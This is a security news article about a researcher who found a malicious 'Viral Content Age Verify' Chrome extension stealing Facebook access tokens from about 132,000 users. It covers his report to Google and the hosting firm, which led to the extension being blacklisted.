Ever wonder how your mild-mannered friend’s Facebook feed suddenly got packed with lewd clickbait? That’s the question Maxime Kjaer was determined to answer when he noticed a friend’s Facebook feed peppered with Likes for sketchy link bait such as “Basic Kissing Tips”.
“Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at Swiss Federal Institute of Technology in Switzerland, in a blog post Monday.
What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension.
The malware-laced extension called “Viral Content Age Verify” allowed a third-party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer describes.
Going down the rabbit hole began with clicking Like on one of his Facebook friend’s “semi-raunchy” Liked item. As soon as he did he was asked to verify his age via by installing the Viral Content Age Verify Chrome browser extension.
By agreeing to install the extension, Kjaer watched as a metadata file called manifest.json began to run through three scripts (background.js, query-string.js and install.js). Both background.js and query-string.js scripts are innocuous. However, the install.js script fetches the malware payload from two hard-coded URLs. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote.
Post-script execution, the C2’s instructions were to steal access tokens (the equivalent of having your username and password) for Facebook so the malware authors can control your Facebook account. The first step for malware authors and a hijacked Facebook account was to Like a Facebook page called a page called VVideosss.
While Kjaer said the malware functions that he documented were Facebook specific, he noted that the credential stealing function also applied to YouTube. Once credentials are collected, he observed, the malware sends back to the C2 information identifying the infected machine, what version of the age verification extension you are running and whether or not you are currently logged into Facebook.
All together Kjaer said there were nine identical variations of the Viral Content Age Verify extensions on the Google Chrome Webstore with a cumulative total of 132,265 users. Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions.
“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote.
Google did not immediately respond to Threatpost’s request for comment but the company did reply to Kjaer, and confirmed it blacklisted the Age Verification extensions. Will Harris, a member of Chrome’s Security team told Kjaer that when extensions are blacklisted they are also automatically removed from the user’s computers as well.
Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed.
— Will Harris (@parityzero) July 18, 2016
Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security.
“The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote, “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”